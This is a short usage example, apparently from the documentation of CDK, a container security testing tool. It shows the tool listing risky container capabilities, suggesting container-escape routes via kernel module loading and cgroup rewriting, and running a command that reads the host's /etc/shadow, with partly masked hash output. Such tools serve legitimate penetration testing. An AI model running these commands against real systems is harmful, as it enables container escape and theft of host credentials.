Screenshots
Example Usage
> ./cdk eva --full [*] Maybe you can exploit the *Capabilities* below: [!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation. [!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/. Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'. Critical - Possible Privileged Container Found. > ./cdk run cap-dac-read-search Running with target: /etc/shadow, ref: /etc/hostname ubuntu:$6$*******:19173:0:99999:7::: root:*:18659:0:99999:7::: daemon:*:18659:0:99999:7::: bin:*:18659:0:99999:7:::